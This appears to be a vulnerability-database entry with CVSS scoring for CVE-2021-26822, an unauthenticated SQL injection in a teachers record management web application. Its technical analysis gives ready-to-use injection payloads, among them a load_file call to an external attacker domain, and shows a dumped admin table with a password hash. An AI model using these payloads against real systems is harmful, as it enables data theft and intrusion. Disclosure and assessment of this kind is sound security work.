Attacker Value
Very High
(1 user assessed)
Exploitability
Very High
(1 user assessed)
User Interaction
None
Privileges Required
None
Attack Vector
Network
1

CVE-2021-26822

Disclosure Date: February 15, 2021
CVE-2021-26822 CVSS v3 Base Score: 9.8
Add MITRE ATT&CK tactics and techniques that apply to this CVE.
Execution
Techniques
Validation
Validated
Validated

Description

Teachers Record Management System 1.0 is affected by a SQL injection vulnerability in ‘searchteacher’ POST parameter in search-teacher.php. This vulnerability can be exploited by a remote unauthenticated attacker to leak sensitive information and perform code execution attacks.

Add Assessment

1
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Very High
Easy to weaponizeGives privileged accessVulnerable in default configuration
Technical Analysis

CVE-2021-26822

Vendor Software

Description

The searchteacher parameter appears to be vulnerable to SQL injection attacks.
The payload ‘+(select load_file(’\\g1ivok7s826weh3qbkb5z839f0lt9k48vbj36tui.nu11secur1tyattack.net\bqd’))+’ was submitted in the searchteacher parameter.
This payload injects a SQL sub-query that calls MySQL’s load_file function with a UNC file path that references a URL on an external domain.
The application interacted with that domain, indicating that the injected SQL query was executed.

Paylod

---
Parameter: searchteacher (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: searchteacher=470114'+(select load_file('\\\\g1ivok7s826weh3qbkb5z839f0lt9k48vbj36tui.nu11secur1tyattack.net\\bqd'))+'' AND (SELECT 5113 FROM (SELECT(SLEEP(5)))KIjD) AND 'VevZ'='VevZ&search=%C2%9E%C3%A9e

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: searchteacher=470114'+(select load_file('\\\\g1ivok7s826weh3qbkb5z839f0lt9k48vbj36tui.nu11secur1tyattack.net\\bqd'))+'' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170707171,0x464270665473516670554b446c745478524849484b654b554b52594859554643445044594f587455,0x7170626b71),NULL,NULL,NULL-- -&search=%C2%9E%C3%A9e
---

After the exploit

Database: trms
Table: tbladmin
[1 entry]
+----+---------------------+----------------------------------+----------+-----------+---------------------+--------------+
| ID | Email               | Password                         | UserName | AdminName | AdminRegdate        | MobileNumber |
+----+---------------------+----------------------------------+----------+-----------+---------------------+--------------+
| 1  | adminuser@gmail.com | f925916e2754e5e03f75dd58a5733251 | admin    | Admin     | 2019-10-04 09:10:04 | 8979555556   |
+----+---------------------+----------------------------------+----------+-----------+---------------------+--------------+

Reproduce:

href

Proof

href

Log in to Add Reply
CVSS V3 Severity and Metrics
Base Score:
9.8 Critical
Impact Score:
5.9
Exploitability Score:
3.9
Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector (AV):
Network
Attack Complexity (AC):
Low
Privileges Required (PR):
None
User Interaction (UI):
None
Scope (S):
Unchanged
Confidentiality (C):
High
Integrity (I):
High
Availability (A):
High

General Information

Offensive Application
Unknown
Utility Class
Unknown
Ports
Unknown
OS
Unknown
Vulnerable Versions
n/a
Prerequisites
Unknown
Discovered By
Unknown
PoC Author
Unknown
Metasploit Module
Unknown
Reporter
Unknown

Vendors

  • phpgurukul

Products

  • teachers record management system 1.0

Additional Info

Authenticated
Unknown
Exploitable
Unknown
Reliability
Unknown
Stability
Unknown
Available Mitigations
Unknown
Shelf Life
Unknown
Userbase/Installbase
Unknown
Patch Effectiveness
Unknown
Technical Analysis